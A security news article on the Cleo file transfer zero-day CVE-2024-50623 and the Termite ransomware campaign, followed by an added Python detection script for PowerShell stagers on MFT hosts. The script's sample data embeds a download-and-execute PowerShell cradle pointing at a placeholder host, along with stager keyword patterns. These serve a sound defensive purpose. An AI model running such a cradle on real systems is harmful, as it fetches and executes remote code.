A recently discovered zero-day flaw in the Cleo managed file transfer tool has set off a chain of events that is expected to lead to a surge in ransomware attacks. The vulnerability, tracked as CVE-2024-50623, allows remote code execution (RCE) and affects several Cleo products, including Cleo Harmony, Cleo VLTrader, and Cleo LexiCon.
According to the company’s security advisory, the vulnerability was not adequately patched, leading to its exploitation by cybercriminals. This, in turn, has prompted a group known as “Termite” to launch a ransomware campaign targeting Cleo clients. The attacks began on Dec. 3, with at least 10 organizations already compromised, including businesses in the trucking, shipping, and food industries. With over 4,000 customers, mostly mid-sized organizations, Cleo is facing a significant threat.
The Termite group has been linked to previous cyberattacks against companies like Blue Yonder, which had far-reaching impacts felt by major brands like Starbucks. Analysts from Arctic Wolf are now warning that the ransomware attacks targeting Cleo systems are likely to intensify in the coming days.
Following the success of a ransomware attack against MOVEit, a similar file transfer service, threat actors have realized the potential of exploiting vulnerabilities in managed file transfer solutions. The public disclosure of a proof-of-concept exploit for the Cleo zero-day on Dec. 11 has only fueled concerns about the widespread implications of this security flaw.
Patching the zero-day has proven to be challenging for Cleo customers, further exacerbating the situation. Despite initial attempts to address the issue in a previous software update, ongoing compromises prompted the release of another security patch. However, the lack of a new CVE designation for the exploit has raised doubts about the effectiveness of the remediation efforts.
As the security landscape evolves, organizations must be vigilant in detecting and responding to potential compromises. Arctic Wolf researchers have identified a malicious PowerShell stager that leads to the deployment of a new Java-based backdoor called “Cleopatra.” This backdoor is designed to access data within Cleo MFT software, highlighting the need for proactive monitoring and security measures.
Defenders are advised to focus on monitoring server assets for suspicious activity, such as PowerShell commands, and to regularly audit devices for vulnerabilities in internet-accessible services. By implementing IP access control lists and keeping critical applications behind a VPN, organizations can reduce their exposure to mass exploitation campaigns like the one targeting Cleo systems.
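As an added illustration of the monitoring advice above (this is not code from the article or from Arctic Wolf), the Python below triages process-creation events from a managed file transfer host: it flags powershell.exe spawned by the JVM that hosts the MFT application and decodes -EncodedCommand payloads so a download-and-execute cradle can be matched. The event shape, host name, JVM process names and sample stager are constructed assumptions, not indicators taken from the page.

```python
import base64
import re

# Parent process names for a Java-based MFT server (assumption: the Cleo products
# run inside a JVM; adjust to the image name your service actually runs under).
JVM_PARENTS = ("java.exe", "javaw.exe")
# Command-line fragments typical of a PowerShell download/execute stager.
STAGER_PATTERN = re.compile(r"(?i)(downloadstring|downloadfile|invoke-webrequest|\biex\b|invoke-expression|frombase64string)")
# Constructed stager body of the kind an -EncodedCommand carries (not a real sample).
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')"
SAMPLE_B64 = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16le")).decode("ascii")
# Constructed process-creation events in a simplified Sysmon EID 1 shape (not real telemetry).
SAMPLE_EVENTS = [
    {"host": "mft-01", "parent_image": r"C:\Java\bin\java.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -NoP -W Hidden -enc " + SAMPLE_B64},
    {"host": "mft-01", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"},
    {"host": "mft-01", "parent_image": r"C:\Windows\System32\services.exe",
     "image": r"C:\Java\bin\java.exe", "command_line": "java.exe -jar app.jar"},
]

def decode_encoded_command(cmdline):
    """Return the script carried by -e/-ec/-enc/-EncodedCommand (base64 of UTF-16LE), else None."""
    m = re.search(r"(?i)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def triage(event):
    """Return the reasons an event looks like a PowerShell stager; an empty list means benign."""
    reasons = []
    parent = event["parent_image"].rsplit("\\", 1)[-1].lower()
    child = event["image"].rsplit("\\", 1)[-1].lower()
    if parent in JVM_PARENTS and child == "powershell.exe":
        reasons.append(f"powershell.exe spawned by JVM process {parent}")
    decoded = decode_encoded_command(event["command_line"])
    if decoded is not None:
        reasons.append("encoded command decodes to: " + decoded[:60])
    if STAGER_PATTERN.search(event["command_line"]) or (decoded and STAGER_PATTERN.search(decoded)):
        reasons.append("download/execute cradle pattern in command line")
    return reasons

def scan(events):
    """Return [(event, reasons)] for every event that triage flagged."""
    return [(e, triage(e)) for e in events if triage(e)]
```

The -ExecutionPolicy event is deliberately included as a negative case: the decoder must not mistake other -E… switches for an encoded command.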
In conclusion, the escalating ransomware campaign against Cleo underscores the importance of robust cybersecurity practices and timely threat detection. Organizations must remain vigilant and proactive in safeguarding their systems against evolving cyber threats.
